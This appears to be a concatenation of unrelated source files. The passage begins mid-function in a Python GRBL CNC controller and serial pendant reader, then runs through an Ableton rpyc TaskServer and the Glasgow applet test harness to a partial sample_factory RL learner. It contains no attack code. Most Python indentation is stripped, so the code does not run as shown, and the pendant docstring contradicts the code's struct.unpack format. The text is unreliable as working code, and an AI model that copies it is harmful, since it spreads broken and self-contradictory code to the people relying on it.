while(self.connect_cmd): #while polling
t=time.time()
while(self.block_lock):
pass
self.block_lock = True
self.blocks_to_send_private += self.blocks_to_send
self.blocks_to_send = []
self.block_lock = False
if not self.connection_handle:
try:
self.connection_handle = serial.Serial(self.port, 115200, timeout=0.1)
except Exception as e:
if not self.connection_err:
event_msg = "CNC Controller comm err: {}".format(e)
self.connection_manager.emit("new_event", event_msg)
self.connection_err = True
self.tags['state'].update({"Value": 0, 'Timestamp': t})
self.connection_handle = None
if self.connection_handle:
self.connection_err = False
if 1: #try:
if self.realtime_cmd:
if type(self.realtime_cmd) == bytes:
                            self.connection_handle.write(self.realtime_cmd + b"\n")
else:
self.connection_handle.write("{}\n".format(self.realtime_cmd).encode("ascii"))
self.realtime_cmd = None
if self.settings_read_req:
self.connection_handle.write("$$\n".encode("ascii")) # triggers a read of all settings
chars_sent = 0
for block in self.blocks_sent:
chars_sent += len(block)
buff_avail = CNC_BUFFER_SZ - chars_sent
while len(self.blocks_to_send_private) and len(self.blocks_to_send_private[0]) <= buff_avail:
block = self.blocks_to_send_private.pop(0)
buff_avail -= len(block)
self.connection_handle.write("{}\n".format(block).encode("ascii"))
self.blocks_sent = [block] + self.blocks_sent
self.connection_handle.write("?\n".encode("ascii"))
data = ''
tag_update = {}
self.update_manual_vals()
tag_update.update(self.tags)
keep_going = 1
while keep_going:
b = self.connection_handle.read()
keep_going = len(b)
data+=b.decode('ascii')
lines = data.split('\r\n')
for line in lines:
if line.startswith("<"):
                            update = line.replace("\r", "").replace("\n", "").replace("<", "").replace(">", "").split("|")
if "WCO:" in line:
self.update_tag('spindle-run', 0, t)
self.update_tag('coolant', 0, t)
for pin in 'XYZPDHRS':
self.update_tag(f'pin-{pin}', 0, t)#init pins, if on it will get updated
for idx, field in enumerate(update):
if (idx==0):
self.update_tag('state', self.state_enum[field], t)
elif (field.startswith('MPos:')):
_x,_y,_z = field.replace('MPos:', "").split(',')
self.update_tag('MPos-X', _x, t)
self.update_tag('MPos-Y', _y, t)
self.update_tag('MPos-Z', _z, t)
_x,_y,_z = [float(self.tags['MPos-X']["Value"])-self.WCO[0], float(self.tags['MPos-Y']["Value"])-self.WCO[1], float(self.tags['MPos-Z']["Value"])-self.WCO[2]]
self.update_tag('WPos-X', _x, t)
self.update_tag('WPos-Y', _y, t)
self.update_tag('WPos-Z', _z, t)
elif (field.startswith('Bf:')):
_b,_c = field.replace('Bf:', "").split(',')
self.update_tag('block-in-avail', _b, t)
self.update_tag('chars-avail', _c, t)
elif (field.startswith('F:')):
                                    self.update_tag('feedrate', field.replace('F:', ""), t)
elif (field.startswith('FS:')):
_f, _s = field.replace('FS:', "").split(',')
self.update_tag('feedrate', _f, t)
self.update_tag('spindle-speed', _s, t)
elif (field.startswith('WCO:')):
self.WCO = list(map(lambda s: float(s), field.replace('WCO:', "").split(',')))
for idx, axis in enumerate('xyz'):
self.update_tag(f'WCO-{axis.upper()}', self.WCO[idx], t)
elif (field.startswith('Pn:')):
for pin in field.replace('Pn:', ""):
self.update_tag(f'pin-{pin}', 1, t)
elif (field.startswith('Ov:')):
_orf, _orr, _ors = field.replace('Ov:', "").split(',')
self.update_tag('override-feed', _orf, t)
self.update_tag('override-rapids', _orr, t)
self.update_tag('override-spindle', _ors, t)
elif (field.startswith('A:')):
for acc in field.replace('A:', "").split(','):
if acc == "S": self.update_tag('spindle-run', 1, t) #FWD
if acc == "C": self.update_tag('spindle-run', -1, t) #REV
if acc == "F": self.update_tag('coolant', 1, t) #FLOOD
if acc == "M": self.update_tag('coolant', 2, t) #MIST
else:
event_msg = "CNC Controller field unhandled: {}".format(field)
self.connection_manager.emit("new_event", event_msg)
if line == 'ok':
block_in = len(self.blocks_sent)
if block_in:
self.blocks_sent = self.blocks_sent[1:]
if line.startswith('Grbl'):
pass #connected
if line.startswith("$"):
self.settings_read_req = False
setting, setting_val = line.split("=")
self.update_tag(setting, setting_val, t)
else: #except Exception as e:
self.disconnectDevice()
dt = time.time()-t
to = max(0.1, (self.pollrate - dt)) if self.connection_handle else 1.0
time.sleep(to)
class Pendant(object):
def __init__(self, cnc_connection, port,manager):
self.connection_manager = manager
self.port = port
self.cnc = cnc_connection
self.connection_err = False
self.poll_thread = threading.Thread(target=self.poll, args=(self,))
self.poll_thread.daemon=True
self.poll_thread.start()
def poll(self, *args):
ser = None
while(1): #while polling
if not ser:
try:
ser = serial.Serial(self.port, 115200, timeout=0.1)
except Exception as e:
if not self.connection_err:
event_msg = "CNC Pendant comm err: {}".format(e)
self.connection_manager.emit("new_event", event_msg)
self.connection_err = True
ser = None
if ser:
self.connection_err = False
try:
ser.write("?".encode("ascii"))
data = b''
keep_going = 1
while keep_going:
b = ser.read()
keep_going = len(b)
data+=b
self.cnc.tags["pendant-ticks"] = struct.unpack('l', data)[0]
except Exception as e:
self.cnc.tags["pendant-ticks"] = None
event_msg = 'Pendant read error'
self.connection_manager.emit("new_event", event_msg)
to = 0.2 if ser else 1.0
time.sleep(to)
""" Pendant program
#define TICKS_INIT 2147483648UL
#define A_pin 2
#define B_pin 3
volatile uint32_t ticks_abs = TICKS_INIT;
volatile int32_t ticks = ticks_abs - TICKS_INIT;
String readString;
void setup() {
Serial.begin(115200);
pinMode(A_pin, INPUT_PULLUP);
pinMode(B_pin, INPUT_PULLUP);
attachInterrupt(digitalPinToInterrupt(A_pin), tick, CHANGE);
}
void loop() {
while (Serial.available()) {
delay(2); //delay to allow byte to arrive in input buffer
char c = Serial.read();
readString += c;
}
if (readString.equals(String("?"))) {
Serial.write((uint8_t *)&ticks, 4);
}
readString="";
}
void tick() {
bool a = digitalRead(A_pin);
bool b = digitalRead(B_pin);
if(a == b){
ticks_abs--;
} else {
ticks_abs++;
}
ticks = ticks_abs - TICKS_INIT;
ticks = ticks/2;
}
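Host side: the sketch answers a single '?' with the raw 4 bytes of the signed 32-bit tick
counter (little-endian on AVR), which Pendant.poll() decodes with struct.unpack('<i', ...).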
"""
|
TaskServer.py
|
# -*- coding: utf-8 -*-
#****************************************************************************************
# File: TaskServer.py
#
# Copyright: 2013 Ableton AG, Berlin. All Rights reserved
#****************************************************************************************
import threading
from _Framework.Dependency import depends
from _Framework.Util import const, print_message
from _Framework import Task
import rpyc.lib.compat
from rpyc.utils.server import Server
from rpyc.core import SocketStream, Channel, Connection
from rpyc.utils.authenticators import AuthenticationError
RPYC_SUGGESTED_UPDATE_TIME = 0.01
RPYC_POLL_TIMEOUT = 0.01
RPYC_CLIENT_POLL_TIMEOUT = 0.01
RPYC_POLL_ATTEMPTS = 5
RPYC_READ_ATTEMPT_FACTOR = 0
RPYC_WRITE_ATTEMPT_FACTOR = 1
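# The attempt factors weight the poll budget in tick_server(): read events do not consume an
# attempt (factor 0), write events consume one (factor 1).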
class TaskServer(Server):
@depends(log_message = const(print_message),
parent_task_group = None)
def __init__(self,
service,
log_message = None,
parent_task_group = None,
*a, **k):
super(TaskServer, self).__init__(
service,
*a, **k)
self._log_message = log_message
self._server_task = parent_task_group.add(self.tick_server).kill()
self._all_poll = rpyc.lib.compat.poll()
self._all_poll.register(self.listener.fileno(), 'r')
self._fd_to_conn = {}
self.log_message("server created")
def start(self):
self.listener.listen(self.backlog)
self.logger.info("server started on [%s]:%s", self.host, self.port)
self.active = True
if self.auto_register:
# [jbo] This is copied from the base class, but I am not
            # sure it will work or is even needed... embedded Python often
# needs special stuff to enable threading.
t = threading.Thread(target = self._bg_register)
t.setDaemon(True)
t.start()
self._server_task.restart()
self.log_message("server started")
def close(self):
self._server_task.kill()
super(TaskServer, self).close()
self.log_message("server stopped")
def log_message(self, *messages):
self._log_message("[%s]" % self.service.get_service_name(), *messages)
def tick_server(self, delta=None):
left_attempts = RPYC_POLL_ATTEMPTS
while left_attempts > 0:
try:
active = self._all_poll.poll(RPYC_POLL_TIMEOUT)
attempts = 1
for fd, evt in active:
if fd == self.listener.fileno():
self._handle_accept(fd, evt)
elif fd in self._fd_to_conn:
self._handle_serve(fd, evt)
if 'r' in evt:
attempts = RPYC_READ_ATTEMPT_FACTOR
elif 'w' in evt:
attempts = RPYC_WRITE_ATTEMPT_FACTOR
left_attempts -= attempts
except Exception, e:
# The select module on Windows throws a select.error exception when any
# of the elements in the select set is not a valid file descriptor any
# more. It doesn't tell us which one though, so we need to iterate over
# all fds and find out which ones no longer work.
#
# On Mac there's no such exception type (it only throws IOError there),
# so we need to do these string comparisons instead of catching the
# exception by type.
if e.__class__.__name__ == 'error' and e.__class__.__module__ == 'select':
self._drop_broken_sockets_on_windows()
else:
raise
return Task.RUNNING
def _drop_broken_sockets_on_windows(self):
import select
for fd in list(self._all_poll.rlist):
try:
select.select([fd], [], [], 0)
except select.error:
self._handle_drop(fd, '')
for fd in list(self._all_poll.wlist):
try:
select.select([], [fd], [], 0)
except select.error:
self._handle_drop(fd, '')
def _handle_drop(self, fd, ev):
self.log_message("client dropped", fd, ev)
try:
self._all_poll.unregister(fd)
conn = self._fd_to_conn[fd]
del self._fd_to_conn[fd]
conn.close()
except KeyError:
pass
def _handle_accept(self, fd, ev):
sock, addrinfo = self.listener.accept()
self.log_message("new client:", addrinfo)
self.clients.add(sock)
self._all_poll.register(sock.fileno(), 'rw')
conn = self._authenticate_and_build_connection(sock)
self._fd_to_conn[sock.fileno()] = conn
def _handle_serve(self, fd, ev):
try:
if 'e' in ev or 'h' in ev or 'n' in ev:
raise EOFError
self._fd_to_conn[fd].poll_all(RPYC_CLIENT_POLL_TIMEOUT)
except EOFError:
self._handle_drop(fd, ev)
def accept(self):
raise NotImplementedError, "we do not want the blocking version"
def _authenticate_and_build_connection(self, sock):
"""
        Authenticate a client and, if it succeeds, wrap the socket
in a connection object. Note that this code is cut and paste
from the rpyc internals and may have to be changed if rpyc
evolves
"""
# authenticate
if self.authenticator:
h, p = sock.getpeername()
try:
sock, credentials = self.authenticator(sock)
except AuthenticationError:
self.log_message(
"%s:%s failed to authenticate, rejecting connection",
h, p)
return None
else:
credentials = None
# build a connection
h, p = sock.getpeername()
config = dict(self.protocol_config,
credentials = credentials,
connid = "%s:%d" % (h, p))
return Connection(self.service,
Channel(SocketStream(sock)),
config = config)
|
__init__.py
|
import re
import argparse
from ..gateware.clockgen import *
__all__ = ["GlasgowAppletError", "GlasgowApplet", "GlasgowAppletTool"]
class GlasgowAppletError(Exception):
"""An exception raised when an applet encounters an error."""
class _GlasgowAppletMeta(type):
def __new__(metacls, clsname, bases, namespace, **kwargs):
# Any class that overrides interact() no longer has its superclass' custom REPL, so be
# helpful and reset that attribute.
if "has_custom_repl" not in namespace and "interact" in namespace:
namespace["has_custom_repl"] = False
return type.__new__(metacls, clsname, bases, namespace, **kwargs)
class GlasgowApplet(metaclass=_GlasgowAppletMeta):
all_applets = {}
def __init_subclass__(cls, name):
if name in cls.all_applets:
raise ValueError("Applet {!r} already exists".format(name))
cls.all_applets[name] = cls
cls.name = name
preview = False
help = "applet help missing"
description = "applet description missing"
required_revision = "A0"
has_custom_repl = False
@classmethod
def add_build_arguments(cls, parser, access):
access.add_build_arguments(parser)
def derive_clock(self, *args, clock_name=None, **kwargs):
try:
return ClockGen.derive(*args, **kwargs, logger=self.logger, clock_name=clock_name)
except ValueError as e:
if clock_name is None:
raise GlasgowAppletError(e)
else:
raise GlasgowAppletError("clock {}: {}".format(clock_name, e))
def build(self, target):
raise NotImplementedError
@classmethod
def add_run_arguments(cls, parser, access):
access.add_run_arguments(parser)
async def run_lower(self, cls, device, args, **kwargs):
return await super(cls, self).run(device, args, **kwargs)
async def run(self, device, args):
raise NotImplementedError
@classmethod
def add_interact_arguments(cls, parser):
pass
async def interact(self, device, args, interface):
pass
class GlasgowAppletTool:
def __init_subclass__(cls, applet, **kwargs):
super().__init_subclass__(**kwargs)
applet.tool_cls = cls
cls.applet_cls = applet
cls.logger = applet.logger
@classmethod
def add_arguments(cls, parser):
pass
async def run(self, args):
pass
# -------------------------------------------------------------------------------------------------
import os
import shutil
import unittest
import functools
import asyncio
import threading
import inspect
import json
from nmigen.compat.sim import *
from ..access.simulation import *
from ..access.direct import *
from ..target.simulation import *
from ..target.hardware import *
from ..device.simulation import *
from ..device.hardware import *
from ..platform.all import GlasgowPlatformRevAB
__all__ += ["GlasgowAppletTestCase", "synthesis_test", "applet_simulation_test",
"applet_hardware_test"]
class MockRecorder:
def __init__(self, case, mocked, fixture):
self.__case = case
self.__mocked = mocked
self.__fixture = fixture
@staticmethod
def __dump_object(obj):
if isinstance(obj, bytes):
return {"__class__": "bytes", "hex": obj.hex()}
if isinstance(obj, bytearray):
return {"__class__": "bytearray", "hex": obj.hex()}
raise TypeError("%s is not serializable" % type(obj))
def __dump_stanza(self, stanza):
if not self.__case._recording:
return
json.dump(fp=self.__fixture, default=self.__dump_object, obj=stanza)
self.__fixture.write("\n")
def __dump_method(self, method, args, kwargs, result, coro):
self.__dump_stanza({
"method": method,
"async": coro,
"args": args,
"kwargs": kwargs,
"result": result
})
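    # Each stanza is one JSON object per line in the fixture file; for example, a recorded call like
    # `await iface.read(2)` returning b"\x55\xaa" would be dumped (hypothetical values) as:
    #   {"method": "read", "async": true, "args": [2], "kwargs": {}, "result": {"__class__": "bytes", "hex": "55aa"}}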
def __getattr__(self, attr):
mocked = getattr(self.__mocked, attr)
if inspect.ismethod(mocked):
def wrapper(*args, **kwargs):
result = mocked(*args, **kwargs)
if inspect.isawaitable(result):
async def coro_wrapper():
coro_result = await result
self.__dump_method(attr, args, kwargs, coro_result, coro=True)
return coro_result
return coro_wrapper()
else:
self.__dump_method(attr, args, kwargs, result, coro=False)
return result
return wrapper
return mocked
class MockReplayer:
def __init__(self, case, fixture):
self.__case = case
self.__fixture = fixture
@staticmethod
def __load_object(obj):
if "__class__" not in obj:
return obj
if obj["__class__"] == "bytes":
return bytes.fromhex(obj["hex"])
if obj["__class__"] == "bytearray":
return bytearray.fromhex(obj["hex"])
assert False
def __load(self):
json_str = self.__fixture.readline()
return json.loads(s=json_str, object_hook=self.__load_object)
def __getattr__(self, attr):
json_obj = self.__load()
self.__case.assertEqual(attr, json_obj["method"])
if json_obj["async"]:
async def mock(*args, **kwargs):
self.__case.assertEqual(args, tuple(json_obj["args"]))
self.__case.assertEqual(kwargs, json_obj["kwargs"])
return json_obj["result"]
else:
def mock(*args, **kwargs):
self.__case.assertEqual(args, tuple(json_obj["args"]))
self.__case.assertEqual(kwargs, json_obj["kwargs"])
return json_obj["result"]
return mock
class GlasgowAppletTestCase(unittest.TestCase):
def __init_subclass__(cls, applet, **kwargs):
super().__init_subclass__(**kwargs)
applet.test_cls = cls
cls.applet_cls = applet
def setUp(self):
self.applet = self.applet_cls()
def assertBuilds(self, access="direct", args=[]):
if access == "direct":
target = GlasgowHardwareTarget(revision="A0",
multiplexer_cls=DirectMultiplexer)
access_args = DirectArguments(applet_name=self.applet.name,
default_port="AB", pin_count=16)
else:
raise NotImplementedError
parser = argparse.ArgumentParser()
self.applet.add_build_arguments(parser, access_args)
parsed_args = parser.parse_args(args)
self.applet.build(target, parsed_args)
target.build_plan().execute()
def _prepare_applet_args(self, args, access_args, interact=False):
parser = argparse.ArgumentParser()
self.applet.add_build_arguments(parser, access_args)
self.applet.add_run_arguments(parser, access_args)
if interact:
self.applet.add_interact_arguments(parser)
self._parsed_args = parser.parse_args(args)
def _prepare_simulation_target(self):
self.target = GlasgowSimulationTarget()
self.target.submodules.multiplexer = SimulationMultiplexer()
self.device = GlasgowSimulationDevice(self.target)
self.device.demultiplexer = SimulationDemultiplexer(self.device)
def build_simulated_applet(self):
self.applet.build(self.target, self._parsed_args)
async def run_simulated_applet(self):
return await self.applet.run(self.device, self._parsed_args)
def _prepare_hardware_target(self, case, fixture, mode):
assert mode in ("record", "replay")
if mode == "record":
self.device = GlasgowHardwareDevice()
self.device.demultiplexer = DirectDemultiplexer(self.device)
revision = self.device.revision
else:
self.device = None
revision = "A0"
self.target = GlasgowHardwareTarget(revision=revision,
multiplexer_cls=DirectMultiplexer)
self.applet.build(self.target, self._parsed_args)
self._recording = False
self._recorders = []
async def run_lower(cls, device, args):
if cls is type(self.applet):
if mode == "record":
lower_iface = await super(cls, self.applet).run(device, args)
recorder = MockRecorder(case, lower_iface, fixture)
self._recorders.append(recorder)
return recorder
if mode == "replay":
return MockReplayer(case, fixture)
else:
return await super(cls, self.applet).run(device, args)
self.applet.run_lower = run_lower
async def run_hardware_applet(self, mode):
if mode == "record":
await self.device.download_target(self.target)
return await self.applet.run(self.device, self._parsed_args)
def synthesis_test(case):
synthesis_available = (shutil.which("yosys") is not None and
shutil.which("arachne-pnr") is not None)
return unittest.skipUnless(synthesis_available, "synthesis not available")(case)
def applet_simulation_test(setup, args=[]):
def decorator(case):
@functools.wraps(case)
def wrapper(self):
access_args = SimulationArguments(self.applet)
self._prepare_applet_args(args, access_args)
self._prepare_simulation_target()
getattr(self, setup)()
vcd_name = "{}.vcd".format(case.__name__)
run_simulation(self.target, case(self), vcd_name=vcd_name)
os.remove(vcd_name)
return wrapper
return decorator
def applet_hardware_test(setup="run_hardware_applet", args=[]):
def decorator(case):
@functools.wraps(case)
def wrapper(self):
fixture_path = os.path.join(os.path.dirname(case.__code__.co_filename), "fixtures",
case.__name__ + ".json")
os.makedirs(os.path.dirname(fixture_path), exist_ok=True)
if os.path.exists(fixture_path):
fixture = open(fixture_path, "r")
mode = "replay"
else:
fixture = open(fixture_path, "w")
mode = "record"
try:
access_args = DirectArguments(self.applet, default_port="AB", pin_count=16)
self._prepare_applet_args(args, access_args)
self._prepare_hardware_target(self, fixture, mode)
exception = None
def run_test():
try:
loop = asyncio.new_event_loop()
iface = loop.run_until_complete(getattr(self, setup)(mode))
self._recording = True
loop.run_until_complete(case(self, iface))
except Exception as e:
nonlocal exception
exception = e
thread = threading.Thread(target=run_test)
thread.start()
thread.join()
if exception is not None:
raise exception
except:
if mode == "record":
os.remove(fixture_path)
raise
finally:
if mode == "record":
self.device.usb.close()
return wrapper
return decorator
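# A minimal usage sketch (hypothetical applet class `MyApplet`; not part of this module):
#
#   class MyAppletTestCase(GlasgowAppletTestCase, applet=MyApplet):
#       @synthesis_test
#       def test_build(self):
#           self.assertBuilds()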
|
learner.py
|
from abc import abstractmethod, ABC
from typing import Tuple, Optional
import glob
import os
import shutil
import signal
import threading
import time
from collections import OrderedDict, deque
from os.path import join
from queue import Empty, Queue, Full
from threading import Thread
import numpy as np
import psutil
import torch
from torch.nn.utils.rnn import PackedSequence, invert_permutation
from torch.multiprocessing import Process, Event as MultiprocessingEvent
if os.name == 'nt':
from sample_factory.utils import Queue as MpQueue
else:
from faster_fifo import Queue as MpQueue
from sample_factory.algorithms.appo.appo_utils import TaskType, list_of_dicts_to_dict_of_lists, memory_stats, \
cuda_envvars_for_policy, \
TensorBatcher, iter_dicts_recursively, copy_dict_structure, ObjectPool, iterate_recursively
from sample_factory.algorithms.appo.model import create_actor_critic
from sample_factory.algorithms.appo.aux_losses import CPCA
from sample_factory.algorithms.appo.population_based_training import PbtTask
from sample_factory.algorithms.utils.action_distributions import get_action_distribution, is_continuous_action_space
from sample_factory.algorithms.utils.algo_utils import calculate_gae, EPS
from sample_factory.algorithms.utils.pytorch_utils import to_scalar
from sample_factory.utils.decay import LinearDecay
from sample_factory.utils.timing import Timing
from sample_factory.utils.utils import log, AttrDict, experiment_dir, ensure_dir_exists, join_or_kill, safe_get, safe_put
# noinspection PyPep8Naming
def _build_pack_info_from_dones(dones: torch.Tensor, T: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]:
"""
Create the indexing info needed to make the PackedSequence based on the dones.
PackedSequences are PyTorch's way of supporting a single RNN forward
call where each input in the batch can have an arbitrary sequence length
They work as follows: Given the sequences [c], [x, y, z], [a, b],
we generate data [x, a, c, y, b, z] and batch_sizes [3, 2, 1]. The
data is a flattened out version of the input sequences (the ordering in
    data is determined by sequence length). batch_sizes tells you, for each index,
    how many sequences have a length of (index + 1) or greater.
This method will generate the new index ordering such that you can
construct the data for a PackedSequence from a (N*T, ...) tensor
via x.index_select(0, select_inds)
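    As an illustration, PyTorch's own pack_sequence produces exactly this layout:
        >>> import torch
        >>> from torch.nn.utils.rnn import pack_sequence
        >>> packed = pack_sequence([torch.tensor([3., 4., 5.]), torch.tensor([1., 2.]), torch.tensor([0.])])
        >>> packed.data.tolist(), packed.batch_sizes.tolist()
        ([3.0, 1.0, 0.0, 4.0, 2.0, 5.0], [3, 2, 1])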
"""
num_samples = len(dones)
rollout_boundaries = dones.clone().detach()
rollout_boundaries[T - 1::T] = 1 # end of each rollout is the boundary
rollout_boundaries = rollout_boundaries.nonzero(as_tuple=False).squeeze(dim=1) + 1
first_len = rollout_boundaries[0].unsqueeze(0)
if len(rollout_boundaries) <= 1:
        log.debug('Only one rollout boundary. This can happen if the batch size is 1; it should not happen during real training.')
rollout_lengths = first_len
else:
rollout_lengths = rollout_boundaries[1:] - rollout_boundaries[:-1]
rollout_lengths = torch.cat([first_len, rollout_lengths])
rollout_starts_orig = rollout_boundaries - rollout_lengths
# done=True for the last step in the episode, so done flags rolled 1 step to the right will indicate
# first frames in the episodes
is_new_episode = dones.clone().detach().view((-1, T))
is_new_episode = is_new_episode.roll(1, 1)
# roll() is cyclical, so done=True in the last position in the rollout will roll to 0th position
# we want to avoid it here. (note to self: is there a function that does two of these things at once?)
is_new_episode[:, 0] = 0
is_new_episode = is_new_episode.view((-1, ))
lengths, sorted_indices = torch.sort(rollout_lengths, descending=True)
# We will want these on the CPU for torch.unique_consecutive,
# so move now.
cpu_lengths = lengths.to(device='cpu', non_blocking=True)
# We need to keep the original unpermuted rollout_starts, because the permutation is later applied
# internally in the RNN implementation.
# From modules/rnn.py:
# Each batch of the hidden state should match the input sequence that
# the user believes he/she is passing in.
# hx = self.permute_hidden(hx, sorted_indices)
rollout_starts_sorted = rollout_starts_orig.index_select(0, sorted_indices)
select_inds = torch.empty(num_samples, device=dones.device, dtype=torch.int64)
max_length = int(cpu_lengths[0].item())
# batch_sizes is *always* on the CPU
batch_sizes = torch.empty((max_length,), device='cpu', dtype=torch.int64)
offset = 0
prev_len = 0
num_valid_for_length = lengths.size(0)
unique_lengths = torch.unique_consecutive(cpu_lengths)
    # Iterate over all unique lengths in reverse, as they are sorted
    # in decreasing order
for i in range(len(unique_lengths) - 1, -1, -1):
valids = lengths[0:num_valid_for_length] > prev_len
num_valid_for_length = int(valids.float().sum().item())
next_len = int(unique_lengths[i])
batch_sizes[prev_len:next_len] = num_valid_for_length
new_inds = (
rollout_starts_sorted[0:num_valid_for_length].view(1, num_valid_for_length)
+ torch.arange(prev_len, next_len, device=rollout_starts_sorted.device).view(next_len - prev_len, 1)
).view(-1)
# for a set of sequences [1, 2, 3], [4, 5], [6, 7], [8]
# these indices will be 1,4,6,8,2,5,7,3
# (all first steps in all trajectories, then all second steps, etc.)
select_inds[offset:offset + new_inds.numel()] = new_inds
offset += new_inds.numel()
prev_len = next_len
# Make sure we have an index for all elements
assert offset == num_samples
assert is_new_episode.shape[0] == num_samples
return rollout_starts_orig, is_new_episode, select_inds, batch_sizes, sorted_indices
def build_rnn_inputs(x, dones_cpu, rnn_states, T: int):
"""
Create a PackedSequence input for an RNN such that each
set of steps that are part of the same episode are all part of
a batch in the PackedSequence.
Use the returned select_inds and build_core_out_from_seq to invert this.
:param x: A (N*T, -1) tensor of the data to build the PackedSequence out of
:param dones_cpu: A (N*T) tensor where dones[i] == 1.0 indicates an episode is done, a CPU-bound tensor
:param rnn_states: A (N*T, -1) tensor of the rnn_hidden_states
:param T: The length of the rollout
:return: tuple(x_seq, rnn_states, select_inds)
WHERE
x_seq is the PackedSequence version of x to pass to the RNN
rnn_states are the corresponding rnn state, zeroed on the episode boundary
inverted_select_inds can be passed to build_core_out_from_seq so the RNN output can be retrieved
"""
rollout_starts, is_new_episode, select_inds, batch_sizes, sorted_indices = _build_pack_info_from_dones(dones_cpu, T)
inverted_select_inds = invert_permutation(select_inds)
def device(t):
return t.to(device=x.device)
select_inds = device(select_inds)
inverted_select_inds = device(inverted_select_inds)
sorted_indices = device(sorted_indices)
rollout_starts = device(rollout_starts)
is_new_episode = device(is_new_episode)
x_seq = PackedSequence(x.index_select(0, select_inds), batch_sizes, sorted_indices)
# We zero-out rnn states for timesteps at the beginning of the episode.
# rollout_starts are indices of all starts of sequences
# (which can be due to episode boundary or just boundary of a rollout)
# (1 - is_new_episode.view(-1, 1)).index_select(0, rollout_starts) gives us a zero for every beginning of
# the sequence that is actually also a start of a new episode, and by multiplying this RNN state by zero
# we ensure no information transfer across episode boundaries.
rnn_states = rnn_states.index_select(0, rollout_starts)
is_same_episode = (1 - is_new_episode.view(-1, 1)).index_select(0, rollout_starts)
rnn_states = rnn_states * is_same_episode
return x_seq, rnn_states, inverted_select_inds
def build_core_out_from_seq(x_seq: PackedSequence, inverted_select_inds):
return x_seq.data.index_select(0, inverted_select_inds)
class LearningRateScheduler:
def update(self, current_lr, recent_kls):
return current_lr
def invoke_after_each_minibatch(self):
return False
def invoke_after_each_epoch(self):
return False
class KlAdaptiveScheduler(LearningRateScheduler, ABC):
def __init__(self, cfg):
self.lr_schedule_kl_threshold = cfg.lr_schedule_kl_threshold
self.min_lr = 1e-6
self.max_lr = 1e-2
@abstractmethod
def num_recent_kls_to_use(self) -> int:
pass
def update(self, current_lr, recent_kls):
num_kls_to_use = self.num_recent_kls_to_use()
kls = recent_kls[-num_kls_to_use:]
mean_kl = np.mean(kls)
lr = current_lr
if mean_kl > 2.0 * self.lr_schedule_kl_threshold:
lr = max(current_lr / 1.5, self.min_lr)
if mean_kl < (0.5 * self.lr_schedule_kl_threshold):
lr = min(current_lr * 1.5, self.max_lr)
return lr
class KlAdaptiveSchedulerPerMinibatch(KlAdaptiveScheduler):
def num_recent_kls_to_use(self) -> int:
return 1
def invoke_after_each_minibatch(self):
return True
class KlAdaptiveSchedulerPerEpoch(KlAdaptiveScheduler):
def __init__(self, cfg):
super().__init__(cfg)
self.num_minibatches_per_epoch = cfg.num_batches_per_iteration
def num_recent_kls_to_use(self) -> int:
return self.num_minibatches_per_epoch
def invoke_after_each_epoch(self):
return True
def get_lr_scheduler(cfg) -> LearningRateScheduler:
if cfg.lr_schedule == 'constant':
return LearningRateScheduler()
elif cfg.lr_schedule == 'kl_adaptive_minibatch':
return KlAdaptiveSchedulerPerMinibatch(cfg)
elif cfg.lr_schedule == 'kl_adaptive_epoch':
return KlAdaptiveSchedulerPerEpoch(cfg)
else:
raise RuntimeError(f'Unknown scheduler {cfg.lr_schedule}')
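# Example of the KL-adaptive schedule (hypothetical threshold value): with lr_schedule_kl_threshold=0.008, the
# learning rate is divided by 1.5 whenever the recent mean KL exceeds 0.016 and multiplied by 1.5 when it
# drops below 0.004, clamped to the [1e-6, 1e-2] range.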
class LearnerWorker:
def __init__(
self, worker_idx, policy_id, cfg, obs_space, action_space, report_queue, policy_worker_queues, shared_buffers,
policy_lock, resume_experience_collection_cv,
):
log.info('Initializing the learner %d for policy %d', worker_idx, policy_id)
self.worker_idx = worker_idx
self.policy_id = policy_id
self.cfg = cfg
# PBT-related stuff
self.should_save_model = True # set to true if we need to save the model to disk on the next training iteration
self.load_policy_id = None # non-None when we need to replace our parameters with another policy's parameters
self.pbt_mutex = None # deferred initialization
self.new_cfg = None # non-None when we need to update the learning hyperparameters
self.terminate = False
self.num_batches_processed = 0
self.obs_space = obs_space
self.action_space = action_space
self.shared_buffers = shared_buffers
# deferred initialization
self.rollout_tensors = None
self.policy_versions = None
self.stop_experience_collection = None
self.stop_experience_collection_num_msgs = self.resume_experience_collection_num_msgs = 0
self.device = None
self.actor_critic = None
self.aux_loss_module = None
self.optimizer = None
self.policy_lock = policy_lock
self.resume_experience_collection_cv = resume_experience_collection_cv
self.lr_scheduler: Optional[LearningRateScheduler] = None
self.task_queue = MpQueue()
self.report_queue = report_queue
self.initialized_event = MultiprocessingEvent()
self.initialized_event.clear()
self.model_saved_event = MultiprocessingEvent()
self.model_saved_event.clear()
# queues corresponding to policy workers using the same policy
# we send weight updates via these queues
self.policy_worker_queues = policy_worker_queues
self.experience_buffer_queue = None # deferred initialization
self.tensor_batch_pool = self.tensor_batcher = None
self.with_training = True # set to False for debugging no-training regime
self.train_in_background = self.cfg.train_in_background_thread # set to False for debugging
self.training_thread = None
self.train_thread_initialized = None
self.is_training = False
self.train_step = self.env_steps = 0
# decay rate at which summaries are collected
# save summaries every 5 seconds in the beginning, but decay to every 4 minutes in the limit, because we
# do not need frequent summaries for longer experiments
self.summary_rate_decay_seconds = LinearDecay([(0, 5), (100000, 120), (1000000, 240)])
self.last_summary_time = 0
self.last_saved_time = self.last_milestone_time = 0
self.discarded_experience_over_time = deque([], maxlen=30)
self.discarded_experience_timer = time.time()
self.num_discarded_rollouts = 0
self.process = Process(target=self._run, daemon=True)
if is_continuous_action_space(self.action_space) and self.cfg.exploration_loss == 'symmetric_kl':
raise NotImplementedError('KL-divergence exploration loss is not supported with '
'continuous action spaces. Use entropy exploration loss')
# deferred initialization
self.exploration_loss_func = None
self.kl_loss_func = None
def start_process(self):
self.process.start()
def deferred_initialization(self):
self.rollout_tensors = self.shared_buffers.tensors
self.policy_versions = self.shared_buffers.policy_versions
self.stop_experience_collection = self.shared_buffers.stop_experience_collection
self.pbt_mutex = threading.Lock()
self.experience_buffer_queue = Queue()
self.tensor_batch_pool = ObjectPool()
self.tensor_batcher = TensorBatcher(self.tensor_batch_pool)
self.training_thread = Thread(target=self._train_loop) if self.train_in_background else None
self.train_thread_initialized = threading.Event()
if self.cfg.exploration_loss_coeff == 0.0:
self.exploration_loss_func = lambda action_distr, valids: 0.0
elif self.cfg.exploration_loss == 'entropy':
self.exploration_loss_func = self._entropy_exploration_loss
